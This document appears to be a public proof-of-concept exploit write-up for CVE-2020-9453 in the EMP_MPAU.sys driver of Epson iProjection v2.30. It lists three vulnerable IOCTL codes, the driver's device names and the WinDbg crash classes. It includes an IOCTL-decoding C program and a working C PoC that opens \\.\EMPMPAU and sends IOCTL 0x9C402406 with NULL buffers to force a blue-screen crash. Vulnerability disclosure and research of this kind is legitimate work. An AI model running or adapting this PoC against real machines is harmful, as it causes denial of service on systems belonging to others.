Epson iProjection - EMP_MPAU.sys (CVE-2020-9453)

PoC exploits for the vulnerabilities found in the EMP_MPAU.sys driver that ships with Epson's iProjection software


# Exploit Title: Epson iProjection v2.30 Driver EMP_MPAU.sys Memory Corruption
# Date: 02/15/2020
# Exploit Author: FULLSHADE
# Vendor Homepage: https://epson.com
# Software Link: https://www.epson.eu/epson-projector-software
# Version: v.2.30
# Tested on: Windows 7 / Windows 10
# CVE : CVE-2020-9453

EMP_MPAU.sys

Within the EMP_MPAU.sys driver shipped with Epson iProjection v2.30, three IOCTL handlers in the dispatch function sub_1300C are vulnerable. The addresses below are where each IOCTL code is compared in IDA; all three use METHOD_OUT_DIRECT and require no particular access right on the device handle:

Address   | IOCTL Code | Device Type (hex) | Function | Method                | Access
0x1303B   | 0x9C402402 | <UNKNOWN> 0x9C40  | 0x900    | METHOD_OUT_DIRECT (2) | FILE_ANY_ACCESS (0)
0x13047   | 0x9C402406 | <UNKNOWN> 0x9C40  | 0x901    | METHOD_OUT_DIRECT (2) | FILE_ANY_ACCESS (0)
0x1304F   | 0x9C40240A | <UNKNOWN> 0x9C40  | 0x902    | METHOD_OUT_DIRECT (2) | FILE_ANY_ACCESS (0)

IOCTLs in IDA
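The three codes in the table decode mechanically from the CTL_CODE bit layout (device type in bits 31..16, access in 15..14, function in 13..2, method in 1..0). The program below is an added example, not part of the repository's PoC, that decodes and re-encodes those codes and also answers the question the crash PoC depends on: whether the I/O manager will build an MDL for the output buffer at all. The constant names mirror winioctl.h but are defined locally so it builds on any platform; the codes themselves are the ones from the table above.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdbool.h>

/* Local copies of the winioctl.h method/access constants. */
#define METHOD_BUFFERED   0
#define METHOD_IN_DIRECT  1
#define METHOD_OUT_DIRECT 2
#define METHOD_NEITHER    3
#define FILE_ANY_ACCESS   0

typedef struct {
    uint16_t device_type;   /* bits 31..16 */
    uint16_t function;      /* bits 13..2  */
    uint8_t  method;        /* bits 1..0   */
    uint8_t  access;        /* bits 15..14 */
} ioctl_fields;

/* Split a raw IOCTL code into its CTL_CODE fields. */
ioctl_fields ioctl_decode(uint32_t code) {
    ioctl_fields f;
    f.device_type = (uint16_t)(code >> 16);
    f.access      = (uint8_t)((code >> 14) & 0x3);
    f.function    = (uint16_t)((code >> 2) & 0xFFF);
    f.method      = (uint8_t)(code & 0x3);
    return f;
}

/* Inverse of ioctl_decode; equivalent to the CTL_CODE macro. */
uint32_t ioctl_encode(uint16_t device_type, uint16_t function,
                      uint8_t method, uint8_t access) {
    return ((uint32_t)device_type << 16) |
           ((uint32_t)(access & 0x3) << 14) |
           ((uint32_t)(function & 0xFFF) << 2) |
           (uint32_t)(method & 0x3);
}

/* For METHOD_IN_DIRECT / METHOD_OUT_DIRECT the I/O manager probes and locks the
 * output buffer into an MDL only when its length is non-zero. With a zero-length
 * output buffer the dispatch routine runs with Irp->MdlAddress == NULL, which is
 * exactly the situation the crash PoC creates by passing NULL/0 buffers. */
bool ioctl_has_output_mdl(uint32_t code, uint32_t out_len) {
    uint8_t m = (uint8_t)(code & 0x3);
    return (m == METHOD_IN_DIRECT || m == METHOD_OUT_DIRECT) && out_len != 0;
}

const char *ioctl_method_name(uint8_t method) {
    static const char *names[] = { "METHOD_BUFFERED", "METHOD_IN_DIRECT",
                                   "METHOD_OUT_DIRECT", "METHOD_NEITHER" };
    return names[method & 0x3];
}

int main(void) {
    /* The three EMP_MPAU.sys codes from the table above. */
    const uint32_t codes[] = { 0x9C402402u, 0x9C402406u, 0x9C40240Au };
    size_t i;
    printf("%-12s %-8s %-6s %-18s %-6s %s\n",
           "IOCTL", "DevType", "Func", "Method", "Access", "MDL with OutLen=0?");
    for (i = 0; i < sizeof(codes) / sizeof(codes[0]); i++) {
        ioctl_fields f = ioctl_decode(codes[i]);
        printf("0x%08X   0x%04X   0x%03X  %-18s %-6u %s\n",
               (unsigned)codes[i], f.device_type, f.function,
               ioctl_method_name(f.method), f.access,
               ioctl_has_output_mdl(codes[i], 0) ? "yes" : "no");
    }
    return 0;
}
```

Running it reproduces the Device/Function/Method/Access columns of the table and shows that a zero-length output buffer leaves every one of the three requests without an MDL; a handler that dereferences the MDL (or the address obtained from it) without a NULL check is then one DeviceIoControl call away from a bugcheck.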

IOCTL crash classes (from the WinDBG !analyze output of each PoC run):

IOCTL        WinDBG BUGCHECK_STR   DEFAULT_BUCKET_ID            POC RESULT
0x9C402402   ACCESS_VIOLATION      NULL_CLASS_PTR_DEREFERENCE   BSOD
0x9C402406   ACCESS_VIOLATION      CODE_CORRUPTION              BSOD
0x9C40240A   ACCESS_VIOLATION      CODE_CORRUPTION              BSOD

Device names:

  • \Device\EMPMPAUIO
  • \DosDevices\EMPMPAU

BSOD crash PoC skeleton code (opens the \DosDevices\EMPMPAU symlink as \\.\EMPMPAU and sends one vulnerable IOCTL with no buffers)

#include <stdio.h>
#include <tchar.h>
#include <windows.h>

// Opens the driver's DOS symlink and sends one of the vulnerable IOCTLs with no
// input or output buffer at all. The handler does not validate the (absent)
// buffers and the machine bugchecks. Swap the code for 0x9C402402 or 0x9C40240A
// to trigger the other two crash classes listed above.
int _tmain(int argc, _TCHAR* argv[])
{
	HANDLE m_handle = INVALID_HANDLE_VALUE;
	DWORD nbBytes = 0;
	BOOL ok;

	m_handle = CreateFileA("\\\\.\\EMPMPAU", GENERIC_READ | GENERIC_WRITE, 0, 0, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
	if (m_handle == INVALID_HANDLE_VALUE) {
		printf("[-] CreateFileA failed (error %lu): is iProjection / EMP_MPAU.sys loaded?\n", GetLastError());
		return 1;
	}

	// METHOD_OUT_DIRECT with NULL buffers and zero lengths: no input data is copied
	// and no MDL is built for the output buffer. Expected result: BSOD.
	ok = DeviceIoControl(m_handle, 0x9C402406, NULL, 0, NULL, 0, &nbBytes, NULL);
	printf("[*] DeviceIoControl returned %d (error %lu); no crash?\n", ok, GetLastError());

	CloseHandle(m_handle);
	return 0;
}